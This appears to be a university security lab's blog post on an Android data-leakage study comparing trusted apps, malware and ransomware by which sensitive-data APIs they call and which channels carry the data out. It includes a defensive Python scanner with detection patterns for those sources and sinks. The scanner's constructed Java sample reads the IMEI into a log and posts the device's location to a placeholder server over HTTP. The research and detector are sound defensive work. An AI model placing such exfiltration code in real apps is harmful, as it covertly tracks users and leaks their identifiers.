di Corrado Aaron Visaggio
Malicious apps steal our data, of course, but trusted apps also exfiltrate some personal and sensitive information from our devices.
At ISWAT LAB, the CyberSecurity Laboratory of the Department of Engineering of the University of Sannio, we carried out an analysis of 1,000 very popular trusted apps, 4,593 malware apps gathered from the Drebin project’s dataset, and 672 ransomware samples, taken from here . All the trusted apps were verified with VirusTotal.
In the study we considered the following Android API methods, which retrieve sensitive information:
- getDeviceId: it returns the unique device ID, for example, the IMEI for GSM and the MEID or ESN for CDMA phones;
- getLongitude: gets the longitude, in degrees;
- getLatitude: gets the latitude, in degrees;
- getCountry: it returns the country/region code for this locale, which may be an empty string;
- getLastKnownLocation: it returns a Location indicating the data from the last known location obtained from the given provider;
- getSubscriberId: it returns the unique subscriber ID, for example, the IMSI for a GSM phone;
- getSimSerialNumber: it returns the serial number of the SIM, if applicable;
- getInstalledPackages: it returns a List of all the packages that are installed on the device;
- getInstalledApplications: it returns a List of all the application packages that are installed on the device;
- getLine1Number: it returns the phone number string;
- getCid: it returns the cell ID, which identifies the cell tower location;
- getLac: it returns the Location Area Code (LAC).
The exfiltration destinations (channels) that we intercepted are the following:
- Log: this category represents the Android API for creating logs and sending them outside the device. This category can be used to debug the application, but also by malware writers to gather information. Error, warning and info logs are always kept. Malware writers are typically interested in the info logs of the application;
- HTTP: this category represents the URL connection. It is the method malware prefers for writing personal information to a socket. The HTTP channel is usually used to communicate with a Command and Control server, to send the personal information to attackers and/or to third-party servers, but also to download the malicious payload at runtime;
- SharedPreferences: Android provides many ways of storing the data of an application. One of these ways is Shared Preferences, which permits saving and retrieving data in the form of (key, value) pairs. Shared Preferences are stored as a file in the file system of the device. By default they are stored within the app’s data directory, and only the UID associated with the specific running application has the permissions to access them. The class belonging to this category is SharedPreferences;
- File: this category represents storage on a file. Android uses a file system that is similar to disk-based file systems on other platforms. All Android devices have two file storage areas: “internal” and “external” storage. These names come from the early days of Android, when most devices offered built-in non-volatile memory (internal storage) plus a removable storage medium such as a micro SD card (external storage). The main difference between internal and external storage is that the second one is world-readable, so files saved there may be read outside of the owner’s control, while files saved in internal storage are accessible only by the app itself;
- Media: this category refers to all media generated by the application, for instance through the onPictureTaken() method of the PictureCallback class, which is called when an image is available after a picture is taken;
- SMS: SMSs are used by malware to send messages to premium-rate numbers without the user’s involvement. Malware also captures the user’s banking information, such as account number and password. Malware also uses SMSs to communicate with a C&C server and/or to send SMSs containing malicious links to propagate the infection.
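The source methods and sink categories listed above can be turned into a simple static check over decompiled app code. The following scanner is an added example written for this post, not a tool from the study: it counts occurrences of each source method and each sink category in a text dump of decompiled Java (e.g. jadx output; smali is only partially covered by the patterns) and flags, as a coarse heuristic, any method body containing both a source and a sink. The sink patterns and the sample code are assumptions constructed for the example.

```python
import re
from collections import Counter

# Source methods listed in the study (method name -> what it exposes).
SOURCES = {
    "getDeviceId": "IMEI/MEID/ESN", "getLongitude": "longitude", "getLatitude": "latitude",
    "getCountry": "country code", "getLastKnownLocation": "last known location",
    "getSubscriberId": "IMSI", "getSimSerialNumber": "SIM serial number",
    "getInstalledPackages": "installed packages", "getInstalledApplications": "installed apps",
    "getLine1Number": "phone number", "getCid": "cell ID", "getLac": "LAC",
}
# Sink categories from the study; the patterns are assumed representative, not exhaustive.
SINKS = {
    "Log": [r"\bLog\.[vdiwe]\(", r"Landroid/util/Log;->"],
    "HTTP": [r"\bHttpURLConnection\b", r"\.openConnection\("],
    "SharedPreferences": [r"getSharedPreferences\(", r"SharedPreferences\$Editor"],
    "File": [r"\bFileOutputStream\b", r"openFileOutput\("],
    "Media": [r"onPictureTaken\("],
    "SMS": [r"sendTextMessage\(", r"Landroid/telephony/SmsManager;"],
}

def count_sources(text):
    """Occurrences of each sensitive-data source method in the code text."""
    return Counter({n: len(re.findall(r"\b%s\s*\(" % n, text)) for n in SOURCES})

def count_sinks(text):
    """Occurrences of each exfiltration channel in the code text (sum over its patterns)."""
    return Counter({c: sum(len(re.findall(p, text)) for p in pats) for c, pats in SINKS.items()})

def source_sink_pairs(text):
    """Coarse heuristic: a source and a sink in the same method body is a candidate leak.
    Method bodies are split on lines that start with a visibility modifier (assumes
    Java-style decompiler output); no real data-flow tracking is done."""
    pairs = set()
    for body in re.split(r"\n(?=\s*(?:public|private|protected)\b)", text):
        srcs = [n for n, k in count_sources(body).items() if k]
        sinks = [c for c, k in count_sinks(body).items() if k]
        pairs.update((s, c) for s in srcs for c in sinks)
    return sorted(pairs)

# Constructed sample (not taken from any real app): two methods as a decompiler would emit them.
SAMPLE = """
public String fetchId(TelephonyManager tm) {
    String id = tm.getDeviceId();
    Log.i("DBG", "imei=" + id);
    return id;
}
private void upload(LocationManager lm) throws IOException {
    Location loc = lm.getLastKnownLocation("gps");
    HttpURLConnection c = (HttpURLConnection) new URL(SERVER).openConnection();
    c.getOutputStream().write((loc.getLatitude() + "," + loc.getLongitude()).getBytes());
}
"""

if __name__ == "__main__":
    print(count_sources(SAMPLE)), print(count_sinks(SAMPLE))
    for src, sink in source_sink_pairs(SAMPLE):
        print("candidate leak: %s (%s) -> %s" % (src, SOURCES[src], sink))
```

On the sample this reports the IMEI flowing to Log and the location flowing to HTTP, the two patterns the post singles out for trusted apps; on a real decompiled app the same counts give the per-category occurrence figures discussed below.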
In the following figure we report the overall occurrences of the exfiltration methods for the three classes of analyzed apps (ransomware, malware, and trusted).
Ransomware mainly extracts the DeviceID and the phone number, and in fewer cases information about the geographical location of the device.
The other kinds of malware exfiltrate mainly the DeviceID, the identifier of the subscriber, the SIM Serial Number, and the phone number. A smaller number of occurrences regard the exfiltration of information about the geographical location of the device.
Notice that both ransomware and malware aim to obtain personally identifiable information through data exfiltration.
It is interesting that the trusted apps also obtain sensitive information from the device, namely the DeviceId and the geographical location, which is enough to physically track the device.
In the following figure we report the overall occurrences of the exfiltration channels for the three classes of analyzed apps (ransomware, malware, and trusted).
The favorite exfiltration channels for ransomware and malware are HTTP and SharedPreferences, while SMS is scarcely used by ransomware but is fairly common among malware.
Trusted apps tend to use mainly the Log API to record exfiltrated data, with HTTP as the second preferred channel; they make very light use of SharedPreferences and File. Trusted apps do not make use of SMS.
The details of this study can be found in “Data Leakage in Mobile Malware: the what, the why and the how”, published as a chapter in the book “Intrusion Detection and Prevention for Mobile Ecosystems” (Taylor and Francis), edited by George Kambourakis, Asaf Shabtai, Konstantinos Kolias, and Dimitrios Damopoulos. The authors of the chapter are Aaron Visaggio, Gerardo Canfora, Francesco Mercaldo, and Gigi Gentile.